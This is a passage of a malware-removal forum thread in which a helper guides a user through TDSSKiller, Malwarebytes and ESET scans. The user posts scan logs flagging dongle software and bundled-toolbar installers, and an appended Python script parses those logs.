21:54:28.0453 0x1f20  [ 79EC6C0033776F89DD5131241F0170E1, EA958F114DAC06D184735FF8308F0DAA953CA7C0077AF1BBEDC440AAEC2D07A6 ] massfilter      C:\Windows\system32\DRIVERS\massfilter.sys
21:54:28.0500 0x1f20  massfilter - ok
21:54:28.0547 0x1f20  [ A3F4391DFDF2F9E9FE4EAD193265A5AD, A60A1A345622F4758181FB0B6EE784B0B718105FEE7B0F6FEDE5AD59FE448EE1 ] MBAMProtector   C:\Windows\system32\drivers\mbam.sys
21:54:28.0578 0x1f20  MBAMProtector - ok
21:54:28.0734 0x1f20  [ 0BB29DE40C9D9529793DCDB59A43CF5B, 251001A407D32EF22F64915EEFFAAEC229073C4549BF7D9D1D4209B7D15B4681 ] MBAMScheduler   C:\Program Files\Malwarebytes Anti-Malware\mbamscheduler.exe
21:54:28.0796 0x1f20  MBAMScheduler - ok
21:54:28.0859 0x1f20  [ 5F82D8188B370B0CF185D4AE2B9B4A0E, 549B53DD989A069E1C38347C4CEF5283DF9B428CE102799B06A20D3D8F23825F ] MBAMService     C:\Program Files\Malwarebytes Anti-Malware\mbamservice.exe
21:54:28.0890 0x1f20  MBAMService - ok
21:54:28.0937 0x1f20  [ 8E2E9CCD873ABF180F48BCAEEEBE347D, 35DBBB8E63B480151EA5701D9DB7C90642FA2391D044DB400D3644F3E21BB0C1 ] MBAMSwissArmy   C:\Windows\system32\drivers\6BE235D8.sys
21:54:28.0968 0x1f20  MBAMSwissArmy - ok
21:54:28.0999 0x1f20  [ 312CD3307F600E7CD340B79B3DCB3A01, 861A6DFC53C69743129DAAFE73DECDE8D842475503E8D713E7CE5D22AC8D1370 ] MBAMWebAccessControl C:\Windows\system32\drivers\mwac.sys
21:54:29.0015 0x1f20  MBAMWebAccessControl - ok
21:54:29.0030 0x1f20  [ 0FFF5B045293002AB38EB1FD1FC2FB74, 49071B565FD5B2DE43EC00D8518C3BE70843F38919E82F13104B8C1FAFB20374 ] megasas         C:\Windows\system32\DRIVERS\megasas.sys
21:54:29.0061 0x1f20  megasas - ok
21:54:29.0108 0x1f20  [ DCBAB2920C75F390CAF1D29F675D03D6, 85C3A7A010BEA5E3C6179161B295F2CB900A6A214833A5F87A4327392880E2BB ] MegaSR          C:\Windows\system32\DRIVERS\MegaSR.sys
21:54:29.0139 0x1f20  MegaSR - ok
21:54:29.0171 0x1f20  [ 146B6F43A673379A3C670E86D89BE5EA, C4412DCF80DE6B55466F399413271364F14BC0819C224AA161EDDC31A9775440 ] MMCSS           C:\Windows\system32\mmcss.dll
21:54:29.0202 0x1f20  MMCSS - ok
21:54:29.0217 0x1f20  [ F001861E5700EE84E2D4E52C712F4964, F4DC5AEED6F34D76CCEF360862CC47EF71097BE0813C8CE04EE5F0DB387DFFAE ] Modem           C:\Windows\system32\drivers\modem.sys
21:54:29.0249 0x1f20  Modem - ok
21:54:29.0280 0x1f20  [ 79D10964DE86B292320E9DFE02282A23, 52714827B7EEDACA55326A4E4F6158D4942DFAA3BACDE303A2F569BF3F4FAA72 ] monitor         C:\Windows\system32\DRIVERS\monitor.sys
21:54:29.0295 0x1f20  monitor - ok
21:54:29.0327 0x1f20  [ FB18CC1D4C2E716B6B903B0AC0CC0609, F10CCA63493782B16DE6B96B94A27078DBE68AECEF34FDF840CFF86D2C6E3C5E ] mouclass        C:\Windows\system32\drivers\mouclass.sys
21:54:29.0342 0x1f20  mouclass - ok
21:54:29.0358 0x1f20  [ 2C388D2CD01C9042596CF3C8F3C7B24D, B2FB72272BB01AEDA4047B57C943B7E9BD8A6497854F8CC34672AAA592D0A703 ] mouhid          C:\Windows\system32\DRIVERS\mouhid.sys
21:54:29.0373 0x1f20  mouhid - ok
21:54:29.0420 0x1f20  [ FC8771F45ECCCFD89684E38842539B9B, 806DDF2B4830CA866582FE74A521BB7DF26CA0E19013DAF584D3677FB48CC77A ] mountmgr        C:\Windows\system32\drivers\mountmgr.sys
21:54:29.0436 0x1f20  mountmgr - ok
21:54:29.0498 0x1f20  [ 2F7591FB26EEA04245CCF3A0F8E38A28, 49B4A64ACB3641BD42BCCCF0E10E33EDB8016D5770B82A06CE9B951892E7BFBD ] MozillaMaintenance C:\Program Files\Mozilla Maintenance Service\maintenanceservice.exe
21:54:29.0529 0x1f20  MozillaMaintenance - ok
21:54:29.0561 0x1f20  [ 2D699FB6E89CE0D8DA14ECC03B3EDFE0, D3D903EEA465D77345AAC9B9F02CDEADF4831212EA2DE4FCA33BEE26EBB47420 ] mpio            C:\Windows\system32\drivers\mpio.sys
21:54:29.0592 0x1f20  mpio - ok
21:54:29.0639 0x1f20  [ AD2723A7B53DD1AACAE6AD8C0BFBF4D0, 1D6DCFA0E56C3E55B6AED819176E751502F863BA0FCF4F0B3253A81D208141A2 ] mpsdrv          C:\Windows\system32\drivers\mpsdrv.sys
21:54:29.0670 0x1f20  mpsdrv - ok
21:54:29.0732 0x1f20  [ 9835584E999D25004E1EE8E5F3E3B881, 71798B0CBE9AE69F1F29B845319019C69EC7F415CBABB3B87DDE92C360675021 ] MpsSvc          C:\Windows\system32\mpssvc.dll
21:54:29.0795 0x1f20  MpsSvc - ok
21:54:29.0826 0x1f20  [ 03F899F521D2AAED1C55008F734DF252, 4E56A51476A13F5630719018037B1F63DF9ACEA1CFE782AF04E669BD696954C5 ] MRxDAV          C:\Windows\system32\drivers\mrxdav.sys
21:54:29.0888 0x1f20  MRxDAV - ok
21:54:29.0935 0x1f20  [ 5D16C921E3671636C0EBA3BBAAC5FD25, 5BC107B95CAFC88F51FBB9F657B99944B20627A2B618F263093D7045E4FFD65C ] mrxsmb          C:\Windows\system32\DRIVERS\mrxsmb.sys
21:54:29.0982 0x1f20  mrxsmb - ok
21:54:29.0997 0x1f20  [ 6D17A4791ACA19328C685D256349FEFC, 012AA3D84EEAAF53780D06D2D11B9727DFC3441F3FAD75BC9E751FB814403668 ] mrxsmb10        C:\Windows\system32\DRIVERS\mrxsmb10.sys
21:54:30.0060 0x1f20  mrxsmb10 - ok
21:54:30.0091 0x1f20  [ B81F204D146000BE76651A50670A5E9E, 78193D0F967BE9829E53F9B500342934B4B1E1F4CEFC444382959E2061BC3B17 ] mrxsmb20        C:\Windows\system32\DRIVERS\mrxsmb20.sys
21:54:30.0122 0x1f20  mrxsmb20 - ok
21:54:30.0169 0x1f20  [ 012C5F4E9349E711E11E0F19A8589F0A, 208B92DFCF7AD43202660FBBC9FF5E03AEDBEE38178FF3628EB74CB6CD37C584 ] msahci          C:\Windows\system32\drivers\msahci.sys
21:54:30.0200 0x1f20  msahci - ok
21:54:30.0216 0x1f20  [ 55055F8AD8BE27A64C831322A780A228, C2C9FD1F61302997117B1CD0835E8234405BB80084065ED05363B77868397304 ] msdsm           C:\Windows\system32\drivers\msdsm.sys
21:54:30.0247 0x1f20  msdsm - ok
21:54:30.0278 0x1f20  [ E1BCE74A3BD9902B72599C0192A07E27, 5162EB623FE64E9DFEAC6CA2410EFA1314E62EC13207FFBFED2D61AA887603C4 ] MSDTC           C:\Windows\System32\msdtc.exe
21:54:30.0309 0x1f20  MSDTC - ok
21:54:30.0341 0x1f20  [ DAEFB28E3AF5A76ABCC2C3078C07327F, 6EB558532400B489763BAE7203538DE5F196282A8CB46A1B31D59120FC5AFCEF ] Msfs            C:\Windows\system32\drivers\Msfs.sys
21:54:30.0372 0x1f20  Msfs - ok
21:54:30.0387 0x1f20  [ 3E1E5767043C5AF9367F0056295E9F84, B2EDFECD3C14E4FE1BA87D9A86334043A9BD696A554EBD186DA7EAEB2EBD4F70 ] mshidkmdf       C:\Windows\System32\drivers\mshidkmdf.sys
21:54:30.0419 0x1f20  mshidkmdf - ok
21:54:30.0450 0x1f20  [ 0A4E5757AE09FA9622E3158CC1AEF114, ED574E420E57374E328C7C526504ECA569C164287966F06019EC207CB17F2C54 ] msisadrv        C:\Windows\system32\drivers\msisadrv.sys
21:54:30.0465 0x1f20  msisadrv - ok
21:54:30.0497 0x1f20  [ 90F7D9E6B6F27E1A707D4A297F077828, BEFC220EAA7307849600748842ACB9254A6A91158812D9B23EFAF912C498BA7F ] MSiSCSI         C:\Windows\system32\iscsiexe.dll
21:54:30.0528 0x1f20  MSiSCSI - ok
21:54:30.0528 0x1f20  msiserver - ok
21:54:30.0559 0x1f20  [ 8C0860D6366AAFFB6C5BB9DF9448E631, 949C5A14E57F2D7385543C17C3485E7ADE36EA2016F6E0A1866571D2EDE90A77 ] MSKSSRV         C:\Windows\system32\drivers\MSKSSRV.sys
21:54:30.0606 0x1f20  MSKSSRV - ok
21:54:30.0621 0x1f20  [ 3EA8B949F963562CEDBB549EAC0C11CE, 1B0B2F16A1790282504F3C548D47C3281EFB440D5D9711A1EF76D6371B768D2D ] MSPCLOCK        C:\Windows\system32\drivers\MSPCLOCK.sys
21:54:30.0653 0x1f20  MSPCLOCK - ok
21:54:30.0668 0x1f20  [ F456E973590D663B1073E9C463B40932, 48BA6D5580EE7B6A4C06E04772FD35B51779553FC0DD6C5C30DD8B5DEEB25B11 ] MSPQM           C:\Windows\system32\drivers\MSPQM.sys
21:54:30.0699 0x1f20  MSPQM - ok
21:54:30.0715 0x1f20  [ 0E008FC4819D238C51D7C93E7B41E560, 141FCEBDD05874407EAEC35A9DCD3BB16F2A428F23E55487D6A5DBFCADBF10D2 ] MsRPC           C:\Windows\system32\drivers\MsRPC.sys
21:54:30.0731 0x1f20  MsRPC - ok
21:54:48.0094 0x1f20  THREADORDER - ok
21:54:48.0312 0x1f20  [ 3144B3FAF519AF2914629FE11A53CDE5, 50E03666625C8FA949F6D7AA09D19569D40989B7B7A63F87C89EEDBA54C327AB ] TracSrvWrapper  C:\Program Files\CheckPoint\Endpoint Connect\TracSrvWrapper.exe
21:54:48.0452 0x1f20  TracSrvWrapper - ok
21:54:48.0499 0x1f20  [ 4792C0378DB99A9BC2AE2DE6CFFF0C3A, 532A3A812578B2DFD83001DE66FC73689D79EC729409EB572E07E6D65B281712 ] TrkWks          C:\Windows\System32\trkwks.dll
21:54:48.0546 0x1f20  TrkWks - ok
21:54:48.0593 0x1f20  [ 2C49B175AEE1D4364B91B531417FE583, 6C7995E18F84E465C376D1D5F153C15ACB66CDEA86EE5BF186677F572E7E129B ] TrustedInstaller C:\Windows\servicing\TrustedInstaller.exe
21:54:48.0686 0x1f20  TrustedInstaller - ok
21:54:48.0733 0x1f20  [ 6C5139E4283249518F7743D7043775B3, 58684E8C90EBAC65459A97C905CDCFE3A915CFF7E8E96071DE1AC3489F85E67F ] tssecsrv        C:\Windows\system32\DRIVERS\tssecsrv.sys
21:54:48.0842 0x1f20  tssecsrv - ok
21:54:48.0889 0x1f20  [ C6A5FBD4977305E1FA23E02C042DB463, A6EB5E4B8051A258D40A385609E930318EAA3494C8466F48542B806FE6A7C47A ] TsUsbFlt        C:\Windows\system32\drivers\tsusbflt.sys
21:54:48.0952 0x1f20  TsUsbFlt - ok
21:54:48.0998 0x1f20  [ B2FA25D9B17A68BB93D58B0556E8C90D, 0146931B733CAB1CD87F94C35F97E110D6ED6C55EAFF03345400A29AEDE99BDE ] tunnel          C:\Windows\system32\DRIVERS\tunnel.sys
21:54:49.0061 0x1f20  tunnel - ok
21:54:49.0092 0x1f20  [ 750FBCB269F4D7DD2E420C56B795DB6D, E1A95C59148FE463539C34336FD0E74B31A33B8AB2B8E34AA10349C3347471D7 ] uagp35          C:\Windows\system32\DRIVERS\uagp35.sys
21:54:49.0123 0x1f20  uagp35 - ok
21:54:49.0154 0x1f20  [ EE43346C7E4B5E63E54F927BABBB32FF, BAD6FC3BEE45E644D5A6A0A31428F5B2AEC72A0AA0C74EF8177B1FE23EEF3AA9 ] udfs            C:\Windows\system32\DRIVERS\udfs.sys
21:54:49.0201 0x1f20  udfs - ok
21:54:49.0279 0x1f20  [ D1D70D3A1AE2282448D7DED10C37F8C9, 915B6F17272365E2A0F7107D28D0631120613F0908D34B351F7B3AAA1955A476 ] UI Assistant Service C:\Program Files\Reliance 3G\AssistantServices.exe
21:54:49.0310 0x1f20  UI Assistant Service - ok
21:54:49.0342 0x1f20  [ 8344FD4FCE927880AA1AA7681D4927E5, 1B54EFA60A221E2B9FFE59BB41C7E7D8B5AC6826F1C5577456D81371D464255A ] UI0Detect       C:\Windows\system32\UI0Detect.exe
21:54:49.0388 0x1f20  UI0Detect - ok
21:54:49.0404 0x1f20  [ 44E8048ACE47BEFBFDC2E9BE4CBC8880, 5D96D90FDF68AE470CC92CA9DF9DA2C05A53EF455A5A109DBBF7C96F3238257C ] uliagpkx        C:\Windows\system32\drivers\uliagpkx.sys
21:54:49.0420 0x1f20  uliagpkx - ok
21:54:49.0466 0x1f20  [ D295BED4B898F0FD999FCFA9B32B071B, D4130DB4AE76EE6DC0B8E7A4FEF5CB8B26EBD822C21021F6FA78FD29C1E211C2 ] umbus           C:\Windows\system32\drivers\umbus.sys
21:54:49.0513 0x1f20  umbus - ok
21:54:49.0544 0x1f20  [ 7550AD0C6998BA1CB4843E920EE0FEAC, 24C001E422C3B3B920CDCF6003A3179CE464DE4284775403DD5122EF9780460D ] UmPass          C:\Windows\system32\DRIVERS\umpass.sys
21:54:49.0591 0x1f20  UmPass - ok
21:54:49.0622 0x1f20  [ 833FBB672460EFCE8011D262175FAD33, C0C3067A305993CBF056C229771CB0593DD60C9C7AC5130FF1CA610BCA812AB5 ] upnphost        C:\Windows\System32\upnphost.dll
21:54:49.0669 0x1f20  upnphost - ok
21:54:49.0700 0x1f20  [ 0803FBA9FE829D61AE26EC0BCC910C46, 30D00E2C7DFC630C99C1599587D4F9C272BC30D444E07C961AA05BF84587806B ] usbccgp         C:\Windows\system32\DRIVERS\usbccgp.sys
21:54:49.0763 0x1f20  usbccgp - ok
21:54:49.0778 0x1f20  [ 2352AB5F9F8F097BF9D41D5A4718A041, 25BC7828C625B9B2A5110C25B230C5828CEC18EC97ECF9EC4745E8930CBF472C ] usbcir          C:\Windows\system32\drivers\usbcir.sys
21:54:49.0841 0x1f20  usbcir - ok
21:54:49.0888 0x1f20  [ D40855F89B69305140BBD7E9A3BA2DA6, 745DC6D770666F6B19C2B6AA89C21D1A314732E291453BFA2367F9AF86F97C3C ] usbehci         C:\Windows\system32\drivers\usbehci.sys
21:54:49.0919 0x1f20  usbehci - ok
21:54:49.0950 0x1f20  [ EDF2DF71C4F1E13A6AC75F5224DE655A, 1764D155C6B99201774B57195349304259232A12868ECFC2069CA49443EBDC2C ] usbhub          C:\Windows\system32\DRIVERS\usbhub.sys
21:54:49.0997 0x1f20  usbhub - ok
21:54:50.0012 0x1f20  [ 9828C8D14CC2676421778F0DE638CF97, 479A28211FFB85190A01FAB0283B927588805D2C0CDB03F85F8F814B88E4F453 ] usbohci         C:\Windows\system32\drivers\usbohci.sys
21:54:50.0044 0x1f20  usbohci - ok
21:54:50.0059 0x1f20  [ 797D862FE0875E75C7CC4C1AD7B30252, 1BBE745E4C85F8911076F6032ACD7A35FAC048D3CB1500C64E08D8B2C70A1069 ] usbprint        C:\Windows\system32\DRIVERS\usbprint.sys
21:54:50.0075 0x1f20  usbprint - ok
21:54:50.0137 0x1f20  [ F991AB9CC6B908DB552166768176896A, AD8E7A16B23B244B7F834622D4E38B5844193C6E31EF96F61E0E2EA16C945026 ] USBSTOR         C:\Windows\system32\DRIVERS\USBSTOR.SYS
21:54:50.0153 0x1f20  USBSTOR - ok
21:54:50.0168 0x1f20  [ 800AABFD625EEFF899F7E5496BDE37AB, 3EB7ED07760CB348FCA9A06C2B838EF79B51A83C5F70A9C9EAAEAE54480067E2 ] usbuhci         C:\Windows\system32\drivers\usbuhci.sys
21:54:50.0200 0x1f20  usbuhci - ok
21:54:50.0262 0x1f20  [ DE014425522610BEDCA3821BB8C0F1D5, D6FEA0DF07F89834AEEE8C02CC7FD41068D758B6CCECE2EEE5CF4B9DB646FA1E ] usbvideo        C:\Windows\System32\Drivers\usbvideo.sys
21:54:50.0309 0x1f20  usbvideo - ok
21:54:50.0371 0x1f20  [ AF77716205C97E902E6C5B78DECE2CCA, ED99EABED1C7F323EE2A76413E2B260F8EE1D76FDF1E60EE35136D060E756735 ] usb_rndisx      C:\Windows\system32\DRIVERS\usb8023x.sys
21:54:50.0418 0x1f20  usb_rndisx - ok
21:54:50.0449 0x1f20  [ 081E6E1C91AEC36758902A9F727CD23C, 9FDAA17A3B99067E035E5D76305427F15FFDBC5D304B2BB78AFC6463EDDE1A75 ] UxSms           C:\Windows\System32\uxsms.dll
21:54:50.0496 0x1f20  UxSms - ok
21:54:50.0512 0x1f20  [ BF08DE8E4FA1F143D41B3241F7FCE5F6, 4140BE0ECE0D4B8FDD413DBA120F5D7EF6F94628224320EDA2A85E50BEFDA638 ] VaultSvc        C:\Windows\system32\lsass.exe
21:54:50.0527 0x1f20  VaultSvc - ok
21:54:50.0543 0x1f20  [ A059C4C3EDB09E07D21A8E5C0AABD3CB, BDD3729B49DF2E2FC72FFEF9D10235B481A671DE5A721B6B9A80873B7A343F07 ] vdrvroot        C:\Windows\system32\drivers\vdrvroot.sys
21:54:50.0558 0x1f20  vdrvroot - ok
21:54:50.0605 0x1f20  [ C3CD30495687C2A2F66A65CA6FD89BE9, 582E4706C1D6A151020D14B26C7BF166F4E42BDD6E410F30EC452469270C5E9B ] vds             C:\Windows\System32\vds.exe
21:54:50.0699 0x1f20  vds - ok
21:54:50.0730 0x1f20  [ 17C408214EA61696CEC9C66E388B14F3, 829C0416672E2B2DFABCFE641E7F281F41E8DBB3C0EF11C7784CB9BB94F87E97 ] vga             C:\Windows\system32\DRIVERS\vgapnp.sys
21:54:50.0746 0x1f20  vga - ok
21:54:50.0761 0x1f20  [ 8E38096AD5C8570A6F1570A61E251561, 4DBA3C1397A2203548F45F006E66D99F837903F601ABBCE2304754F783CA8A39 ] VgaSave         C:\Windows\System32\drivers\vga.sys
21:54:50.0792 0x1f20  VgaSave - ok
21:54:50.0839 0x1f20  [ 5461686CCA2FDA57B024547733AB42E3, 2721D0659AA890172FCAD4EC4D926B58ACD0EE4887DA51545DC7237420D5BF84 ] vhdmp           C:\Windows\system32\drivers\vhdmp.sys
21:54:50.0870 0x1f20  vhdmp - ok
21:54:50.0902 0x1f20  [ C829317A37B4BEA8F39735D4B076E923, 55D1796AE750071E1E05BD7702B6C355CCFFE27B4C00E93E7044C3184732B497 ] viaagp          C:\Windows\system32\drivers\viaagp.sys
21:54:50.0933 0x1f20  viaagp - ok
21:54:50.0948 0x1f20  [ E02F079A6AA107F06B16549C6E5C7B74, B530DCE3EE4F285B3D5F69F7148D17E016D54F04E6F93706B829A34567748788 ] ViaC7           C:\Windows\system32\DRIVERS\viac7.sys
21:54:50.0980 0x1f20  ViaC7 - ok
21:54:51.0011 0x1f20  [ E43574F6A56A0EE11809B48C09E4FD3C, 3687BF638E21C00E62ABFED70D728B91ADA08F7164CA898E654F31DA196589E9 ] viaide          C:\Windows\system32\drivers\viaide.sys
21:54:51.0042 0x1f20  viaide - ok
21:54:51.0136 0x1f20  [ 17E43BEC5EE81CAB00A00EC306A350A9, 7D40B6A7217CC24FFDB9C351ACDBF12BBD8F719D46E86F198C85BBD36582105E ] VmbService      C:\Program Files\Vodafone\Vodafone Mobile Broadband\Bin\VmbService.exe
21:54:51.0151 0x1f20  VmbService - detected UnsignedFile.Multi.Generic ( 1 )
21:54:56.0190 0x1f20  VmbService ( UnsignedFile.Multi.Generic ) - warning
21:55:15.0456 0x1f20  ================ Scan generic autorun ======================
21:55:17.0063 0x1f20  [ FB91F6C664846A128FC050E4DBB21342, 05DCFC76542D7AB8B176A819E551C7EC53E0F549E79327DEB3BB7518E8363B0B ] C:\Program Files\Vodafone\Vodafone Mobile Broadband\Bin\MobileBroadband.exe
21:55:17.0078 0x1f20  MobileBroadband - detected UnsignedFile.Multi.Generic ( 1 )
21:55:21.0509 0x1f20  MobileBroadband ( UnsignedFile.Multi.Generic ) - warning
21:55:21.0509 0x1f20  Force sending object to P2P due to detect: C:\Program Files\Vodafone\Vodafone Mobile Broadband\Bin\MobileBroadband.exe
21:55:28.0295 0x1f20  Object send P2P result: true
21:55:32.0320 0x1f20  [ CCF2234A35077CA217A61C9CACC48198, C1FB60E22DB42073A7803B2715A779D42D86F762D226312E8D3BC78FBB5D1E1D ] C:\Program Files\Common Files\LightScribe\LightScribeControlPanel.exe
21:55:32.0413 0x1f20  LightScribe Control Panel - detected UnsignedFile.Multi.Generic ( 1 )
21:55:40.0432 0x1f20  Detect skipped due to KSN trusted
21:55:40.0432 0x1f20  LightScribe Control Panel - ok
21:55:40.0634 0x1f20  Waiting for KSN requests completion. In queue: 1
21:55:56.0936 0x1f20  AV detected via SS2: Symantec Endpoint Protection, C:\Program Files\Symantec\Symantec Endpoint Protection\WSCSavNotifier.exe ( 11.0.6300.541 ), 0x71010 ( enabled : outofdate )
21:55:56.0936 0x1f20  FW detected via SS2: Symantec Endpoint Protection, C:\Program Files\Symantec\Symantec Endpoint Protection\Smc.exe ( 11.0.6300.552 ), 0x41010 ( enabled )
21:56:04.0331 0x1f20  ============================================================
21:56:04.0331 0x1f20  Scan finished
21:56:04.0331 0x1f20  ============================================================
21:56:04.0346 0x1fa8  Detected object count: 2
21:56:04.0346 0x1fa8  Actual detected object count: 2
 


Edited by vijay.gupta, 14 February 2015 - 10:38 AM.


#14 OCD


Posted 14 February 2015 - 02:30 PM

Hi vijay.gupta,
 

When I ran TDS Killer, 2 threats are found with medium risk. But, it is the exe file for dongle through which Internet is running


Since you know what these 2 items are related to and you intended for them to run on your computer, you can skip removing them.

Let's rule out any other malware on your computer.

Malwarebytes' Anti-Malware

  • Download Malwarebytes' Anti-Malware (save it to your desktop).
    • Windows XP: Double-click on the icon to run it.
    • Windows Vista, Windows 7 & 8: Right-click and select "Run as Administrator".
  • Select the Scan tab.
  • Select the type of scan to perform:
    • Threat Scan <--- Select this type of scan
    • Custom Scan
    • Hyper Scan
  • Next, click the Scan button.
  • When the scan is complete, if no malicious items are found you can close the program.
  • If malicious items are found, be sure that everything is checked, and click Quarantine.
  • When completed, a log will open in Notepad. Please save it to a convenient location and post the results.
  • Note: If you receive a notice that some of the items couldn't be removed and that they have been added to the delete-on-reboot list, please reboot.
=========================

ESET Online Scanner

*Note:
  • It is recommended to disable your on-board antivirus and anti-spyware programs while performing scans so there are no conflicts; this will also speed up scan time.
  • Please don't go surfing while your resident protection is disabled!
  • Once the scan is finished, remember to re-enable your antivirus along with your anti-spyware programs.
** You need to run your browser with Administrator Rights. To do so, right-click your browser's shortcut and select "Run as Administrator".

= = = = = = = = = = = = = = = = = = = =

Go here to run ESET Online Scanner

(Note: You can use Internet Explorer or FireFox for this scan. If you use FireFox you will be asked to install an additional component. Please allow this.)
  • Tick the box next to YES, I accept the Terms of Use.
  • Click Start
  • When asked, allow the ActiveX control to install
  • Disable your Antivirus software. You can usually do this with its Notification Tray icon near the clock
  • Click Start
  • Make sure that the option "Remove found threats" is Checked, and the option "Scan unwanted applications" is Checked.
  • Click Scan.
  • Wait for the scan to finish.
  • When the scan completes, click List of found threats
  • Click Export to Text file and save the file to your desktop using a unique name, such as ESETScan.
  • Include the contents of this report in your next reply

    Note - when ESET doesn't find any threats, no report will be created.
  • Push the back button.
  • Push Finish
  • Re-enable your Antivirus software.
=========================

In your next post please provide the following:
  • MBAM log
  • ESET's log.txt

OCD



#15 vijay.gupta

vijay.gupta

    Silver Member

  • Authentic Member
  • PipPipPip
  • 400 posts

Posted 15 February 2015 - 07:20 AM

Issue still not resolved after performing the below steps.

 

No threats are found using Malwarebytes. So, I guess there will not be any log. Please let me know if there is any. (no log file opened automatically)

 

 

Running ESET finds some threats. Maybe because I checked "scan for potentially unsafe applications"

ESET Log:

 

D:\dumps\ccsetup320.exe    Win32/Bundled.Toolbar.Google.E potentially unsafe application    deleted - quarantined
D:\dumps\OrbitDownloaderSetup.exe    Win32/OpenCandy potentially unsafe application    deleted - quarantined
D:\dumps\rcsetup151.exe    Win32/Bundled.Toolbar.Google.D potentially unsafe application    deleted - quarantined
D:\dumps\SetupImgBurn_2.5.5.0.exe    a variant of Win32/Bundled.Toolbar.Ask potentially unsafe application    deleted - quarantined
D:\dumps\security\rcsetup147.exe    Win32/Bundled.Toolbar.Google.D potentially unsafe application    deleted - quarantined
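
To read the two logs posted in this thread side by side, the following added example (not part of any post, and not code from TDSSKiller or ESET) parses the "detected via SS2" lines and the ESET export, using lines copied from the posts above as sample input. The field layout is inferred from those samples, and treating detection types that begin with "potentially" as lower priority is an assumption of this example.

```python
import re
from collections import Counter

# Sample input: lines copied from the TDSSKiller and ESET logs posted in this thread.
TDSS_LOG = r"""21:55:56.0936 0x1f20  AV detected via SS2: Symantec Endpoint Protection, C:\Program Files\Symantec\Symantec Endpoint Protection\WSCSavNotifier.exe ( 11.0.6300.541 ), 0x71010 ( enabled : outofdate )
21:55:56.0936 0x1f20  FW detected via SS2: Symantec Endpoint Protection, C:\Program Files\Symantec\Symantec Endpoint Protection\Smc.exe ( 11.0.6300.552 ), 0x41010 ( enabled )"""
ESET_LOG = r"""D:\dumps\ccsetup320.exe    Win32/Bundled.Toolbar.Google.E potentially unsafe application    deleted - quarantined
D:\dumps\OrbitDownloaderSetup.exe    Win32/OpenCandy potentially unsafe application    deleted - quarantined
D:\dumps\rcsetup151.exe    Win32/Bundled.Toolbar.Google.D potentially unsafe application    deleted - quarantined
D:\dumps\SetupImgBurn_2.5.5.0.exe    a variant of Win32/Bundled.Toolbar.Ask potentially unsafe application    deleted - quarantined
D:\dumps\security\rcsetup147.exe    Win32/Bundled.Toolbar.Google.D potentially unsafe application    deleted - quarantined"""

SS2_RE = re.compile(
    r"(?P<kind>AV|FW) detected via SS2: (?P<product>[^,]+), (?P<path>.+?) "
    r"\( (?P<version>[\d.]+) \), (?P<state>0x[0-9a-fA-F]+) \( (?P<flags>[^)]*?) \)")

def parse_ss2(log):
    """One dict per security product that the TDSSKiller log reports via SS2."""
    products = []
    for m in SS2_RE.finditer(log):
        rec = m.groupdict()
        rec["flags"] = [f.strip() for f in rec["flags"].split(":")]
        products.append(rec)
    return products

def parse_eset(log):
    """Split each ESET export line into path, detection name, type and action."""
    rows = []
    for line in log.splitlines():
        parts = re.split(r"\s{2,}|\t", line.strip())
        m = re.match(r"(?:a variant of )?(\S+) (.+)", parts[1]) if len(parts) == 3 else None
        if m:  # blank or malformed lines are skipped
            rows.append({"path": parts[0], "name": m.group(1),
                         "type": m.group(2), "action": parts[2]})
    return rows

def triage(tdss_log, eset_log):
    """Summarise: stale AV products, detections to review first, detection families."""
    stale = [p["product"] for p in parse_ss2(tdss_log)
             if p["kind"] == "AV" and "outofdate" in p["flags"]]
    rows = parse_eset(eset_log)
    # Assumption: types starting with "potentially" are bundled or unwanted software.
    review = [r for r in rows if not r["type"].startswith("potentially")]
    families = Counter(re.sub(r"\.[A-Z]{1,2}$", "", r["name"]) for r in rows)
    return {"stale_av": stale, "review_first": review, "families": families}

if __name__ == "__main__":
    print(triage(TDSS_LOG, ESET_LOG))
```

On these samples every ESET hit is a bundled-installer detection under D:\dumps, while the SS2 line still reports the antivirus as enabled but out of date.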
 

